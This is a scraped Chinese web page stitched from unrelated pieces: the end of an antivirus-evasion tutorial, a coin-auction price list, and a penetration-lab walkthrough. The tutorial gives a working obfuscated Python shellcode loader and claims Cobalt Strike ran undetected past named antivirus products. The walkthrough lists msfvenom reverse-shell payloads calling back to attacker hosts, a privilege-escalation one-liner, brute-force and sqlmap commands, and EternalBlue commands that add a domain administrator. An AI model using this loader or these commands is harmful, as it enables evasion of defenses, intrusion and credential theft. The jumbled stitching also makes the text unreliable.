ctypes.windll.kernel32.GetConsoleWindow()rcpw = GenPassword(13)# 得到经过编码后的shellcode字符串后进行rc4加密，私钥通过GenPassword()函数得到# 以此减少特码，达到内存中不暴露shellcode原始字符串buf = rc4(base64.b64decode(res1.text res2.text res3.text).decode('hex'),'encode',rcpw)rc4(res2.text,'encode',GenPassword(13))# 干扰代码if whnd != 0: if GenPassword(6) != GenPassword(7):#干扰代码 ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd)# 解密shellcodescode = bytearray(rc4(buf, 'decode', rcpw))rc4(res2.text res1.text,'encode',GenPassword(13))# 干扰代码# 申请可读可写不可执行的内存memHscode = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(scode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))rc4(res1.text,'encode',GenPassword(13))# 干扰代码buf = (ctypes.c_char * len(scode)).from_buffer(scode)old = ctypes.c_long(1)# 使用VirtualProtect将shellcode的内存区块设置为可执行，所谓的渐进式加载模式VirtualProtect(memHscode, ctypes.c_int(len(scode)), 0x40, ctypes.byref(old))ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memHscode), buf, ctypes.c_int(len(scode)))fuck=rc4(GenPassword(7),'encode',GenPassword(13))# 干扰代码runcode = cast(memHscode, CFUNCTYPE(c_void_p))# 创建 shellcode 的函数指针fuck=rc4(GenPassword(7),'encode',GenPassword(13))# 干扰代码runcode()# 执行

0x07 利用PyInstaller编译

1、不指定图标的编译方式

python2 PyInstaller.py --noconsole --onefile cscs.py

2、指定图标的编译方式

python2 PyInstaller.py --noconsole --icon csicon.ico --onefile cscs.py

0x08 成果检验

1、测试环境

【win10专业版 windows defender】【win7 企业版 360全家桶 火绒】【微步云沙箱】【virustotal.com】

2、静态查杀

3、微步云沙箱

4、virustotal

​ https://www.virustotal.com/gui/file/b19bdc96af2b885b3f77915761269a640c500b553dd1dd795145d090b9b64042/detection

​ virustotal.com的检测率虽然不太乐观，但是对于国内而言，也能满足日常需求了。

5、动态行为检测

​ 在win7企业版上 360全家桶 火绒全部更新到最新的情况下测试

Cobalt Strike成功上线，且360 火绒没有任何拦截或者提示的行为

当然这都是没用的，接下来看看使用cs的功能时，会怎么样

1、logonpasswords

一切正常，且杀软没有任何拦截与提示

2、查看进程列表

3、屏幕截图

当然，这都是些没用的，接下来，来点刺激的。

4、ms17010

ms17010打得也流畅。且360全家桶 火绒没有任何拦截 提示。

5、联动Metasploit

win10专业版 windows denfender

到这儿了才能说，嗯，还阔以。

附上一张曾经测试时忘了替换vps的ip之后的事情。。。

由于我们上传了微步云沙箱以及virustotal.com，样本就会被各大杀软厂家拿去分析，提炼出特征码，以及研究防御姿势，所以建议大家测试的时候自己搭虚拟机测试吧，不然你的vps就得换了（ip地址会被标记），而且自己fuzz出来的姿势很快就会被提炼出特征码。那为什么我愿意 show you the code呢？因为就算公开的代码被提取了特征码，自己再改改就不杀了啊，就这么简单。

0x09 总结

​ 此种方式的缺点：单文件体积过大，go语言比较小，veil里面有使用go进行免杀的，单文件体积在800kb左右，如果你学过go的语法，建议你利用go语言来免杀，具体操作，你可以在使用veil时，把它生成的go源码拿出来，结合本文所提及或者其他姿势发散你的思维，也能做出很好的效果。当然我首荐：C/C

参考文章

https://payloads.online/archivers/2019-11-10/3

https://xz.aliyun.com/t/4191

https://www.anquanke.com/post/id/190354

Author：AgeloVito

实操首选合天网安实验室，今天推荐实验：《Shellcode编写练习》，复制下方链接做实验！

http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014071816144300001

声明：笔者初衷用于分享与普及网络知识，若读者因此作出任何危害网络安全行为后果自负，与合天智汇及原作者无关！

夏拍流通硬币普制币TOP10

01

第9437号 1989年建国40周年普制币 NGC MS69

成交总价：￥30215.85

02

第9126号 1981年普制1分 NGC MS68PL

成交总价：￥28350

03

第9426号 1988年建行普制币 NGC MINT ERROR MS67

成交总价：￥26250

04

第9123号 1981年普制5分 NGC MS67PL

成交总价：￥20056.05

05

第9456号 1993年大熊猫普制币 PCGS MS69RD

成交总价：￥17010

06

第9141号 1983年普制2角 NGC MS68（老标 11M绿标）

成交总价：￥13427.4

07

第9435号 1988年宁夏 NGC MS69

成交总价：￥12600

08

第9390号 1985年新疆普制币 NGC MS69

成交总价：￥7980

09

第9086号 1980年普制长城1元 NGC MINT ERROR MS68（无砖版）

成交总价：￥7350

10

第9112号 1981年普制长城1元 NGC PF68UC（上海版）

成交总价：￥6930

让黑客直呼太扎心了！糟糕的内网靶场实战

搜索公众号：黑客Anony

可领全套网络安全渗透视频教程，配套攻防靶场。

作者：Sweetmelon

一、环境准备

用网线连接交换机

配置Winodwss攻击机IP为172.16.6.203

攻击机Kali IP为172.16.6.202

主机IP为172.16.6.201

网关为172.16.6.1

子网掩码255.255.255.0

目标IP 172.16.6.10

二、渗透具体流程

总览拓扑图

一开始以为192.168.6.200，一台普通的双网卡主机，没有发现是防火墙，所以10.1.1.0网段的主机拓扑不够清晰，后来老师讲了才知道，防火墙做了端口映射。E主机的445端口映射到防火墙445端口，F主机的3389端口映射到防火墙的3389端口。

攻击目标172.16.6.10

1、菜刀连接

访问主页。发现伪协议注入点。

http://172.16.6.10/index.php?page=php://input

使用菜刀连接，菜刀版本需2020年的版本。

2、生成并上传木马且回连meterpreter

查看phpinfo目标主机为Linux系统的主机。

Msf生成木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 --platform linux -o /home/hula.elf

并use exploit/multi/handle模块监听木马回连情况。

将木马通过菜刀上传木马，赋予运行权限，然后执行。

发现回连到meterpreter。

3、内网信息收集（同时添加路由并建立socks代理）

ipconfig查看网卡信息，发现有两个网段的IP，分别为172.16.6.10和192.168.6.10。

自动添加路由run post/multi/manage/autoroute。

添加路由与代理：

use auxiliary/server/socks4a

show options

set srvhost 172.16.6.147

set srvport 1080

使用portscan模块进行端口扫描

search portscan

set rhosts 192.168.6.0/24。

ipconfig查看网卡信息，发现有两个网段的IP，分别为172.16.6.10和192.168.6.10

给msf添加192.168.6.10段的路由，run autoroute -s 192.168.6.0/24

添加代理：

use auxiliary/server/socks4a

show options

srvhost设为本机

srvport默认1080

可以看到扫描出15、16、17、200四台主机，端口开放情况为

192.168.6.15 21/22

192.168.6.16 22/80/3306/8080

192.168.6.17 22/80/3306

192.168.6.200 80/135/445/3389

4、尝试本机提权

用一句话提权

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever exploit.conf" staprun -u whatever> exploit.conf; MODPROBE_OPTIONS="-C

攻击目标192.168.6.15

1、hydra爆破ftp账号

因为目标机开放了21端口，用hydra爆破ftp弱密码。

proxychains hydra -L /usr/wordlists/字典/Usernames/top_shortlist.txt -P /usr/wordlists/rockyou.txt -f -t 50 -vV ssh://192.168.6.15 -o ./ssh.log

爆破出账号为admin，密码为123456

2、登录ftp服务

proxychains ftp 192.168.6.15，登陆后用dir命令发现报错

使用xshell连接，发现可以连接。

攻击目标192.168.6.16

1、发现tomcat

由于目标主机开发了8080端口，猜测有tomcat漏洞。

访问网页192.168.6.16：8080发现有tomcat页面。

2、MSF爆破tomcat密码

下面尝试利用MSF爆破tomcat的账号密码，利用auxiliary/scanner/http/tomcat_mgr_login模块，除了设置目标IP，用户名字典，密码字典外，再设置stop_on_success为true，意思是baopochen成功后停止。

默认管理后台路径为manager/html，也不用改，端口也不用改。成功爆破得到账号密码为tomcat/tomcat

3、继续攻击取得shell

使用msf中upload、deploy两个模块的tomcat漏洞发现无法绑定IP和端口。

使用msf生成war木马文件。然后使用监听模块监听木马回连情况。

msfvenom -p java/meterpreter/reverse _tcp LHOST=192.168.6.10 LPORT=20003 -f war > lmx3.war

在下面的页面上传war木马文件。

在网页上查看自己的木马，返回msf发现已返回meterpreter

攻击目标192.168.6.17

1、SQL注入进后台

访问该站点。

kali下敏感目录扫描工具Nikto使用：攻击机：172.16.6.147（kali linux）、靶机：192.168.6.17 ( Metasploitable2-Linux)、使用Nikto 进行敏感目录扫描、参数解析：-h/-host 指定域名或者IP、发现这个敏感目录扫描不够强大。

发现sql注入点http://192.168.6.17/message.php?id=

用手工简单地测试了下：

http://192.168.6.17/message.php?id=1 页面正常

http://192.168.6.17/message.php?id=1 order by 1页面正常

http://192.168.6.17/message.php?id=1 order by 100页面不正常

所以存在注入漏洞

sqlmap跑出数据库的密码

proxychains sqlmap -r /home/17tou.txt --batch –dbs

proxychains sqlmap -r /home/17tou.txt --batch --dbs -T admin –dump

最后爆出账号是admin,密码是xxxxxxx，使用md5解密

利用账号密码成功登录192.168.6.17的后台

2、MSF生成php木马反弹meterpreter

浏览页面，发现有一个文件上传的注入点。上传木马，f12发现木马上传的位置与命名。

http://192.168.6.17/upload/images/20201022123044.php

在win10上安装sockscap，管理员身份运行，代理设置kali的IP地址，端口1080。在sockscap上添加菜刀程序。使用菜刀连接木马。

2、MSF生成php木马反弹meterpreter

通过菜刀连接，发现目标主机为Linux系统。

用MSF生成的反弹木马，然后起监听。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.6.10 LPORT=2339 -f elf -a x86 --platform linux -o /home/biu.elf

通过菜刀上传到目标主机，赋予权限，然后运行。发现不能弹回meterpreter。

攻击目标192.168.6.200

1、尝试访问web服务

因为发现目标开放了80，所以访问下web站点

在kali自带的火狐浏览器中设置socks代理，访问192.168.6.200,发现页面提示输入账号密码。尝试了弱口令的账号密码，发现无法人工爆破。

2、永恒之蓝攻击

由于目标开放了445端口，所以怀疑可能存在永恒之蓝漏洞。

使用ms17-010的command模块进行攻击。

添加用户，并添加至管理员组（或者直接修改administrator管理员密码）

set command ‘net user cbr Cbr123456 /add‘

set command ‘net "Domain Admins" cbr /add /domain'

用命令set command 'net group "Domain Admins"'来查看是否成功添加到域管理员组。

3、远程登录

proxychains rdesktop 192.168.6.200

查看IP信息ipconfig /all，发现目标主机在域里面。网关为10.1.1.1，还有一个地址为10.1.1.200，因为目标主机为双网卡，但没有发现目标主机的地址192.168.6.200的存在，惊天大怪事啊。后来讲解的时候才知道，这里是做了端口映射。

攻击域成员机10.1.1.200

1、创建用户并加入到域管理员组

由于目标开放了445端口，所以怀疑可能存在永恒之蓝漏洞。

继续用17010执行高权限命令的模块进行攻击：

添加用户，并添加至管理员组（或者直接修改administrator管理员密码）

set command ‘net user cbr Cbr123456 /add‘

set command ‘net "Domain Admins" cbr /add /domain'

用命令set command 'net group "Domain Admins"'来查看是否成功添加到域管理员组。

发现已经成功添加到域管理员组

2、用创建地域管理员登录域环境

远程登录10.1.1.200

使用共享文件proxychains rdesktop 10.1.1.200 -r disk:aa=/home

远程登录administrator

上传木马并运行，发现meterpreter弹不回来，遂放弃

攻击域控10.1.1.10

1、猜测端口转发

以10.1.1.10为目标地址，使用msf的ms17-010模块攻击，发现操作并没有在10.1.1.10上执行，而是在192.168.6.200上执行。猜测是进行了端口映射。

所以将192.168.6.200作为中间机器，使用lcx，但发现无法实现端口转发。

使用xshell建立192.168.6.200与10.1.1.10之间的隧道，但发、法建立。遂放弃。

最后

通过ms17-010的command模块可以添加用户，但是command后面的指令要加单引号，因为是长命令。

远程登录10.1.1.10

公众号：黑客Anony 欢迎了解更多干货！！

听说好看的人都会关注哦！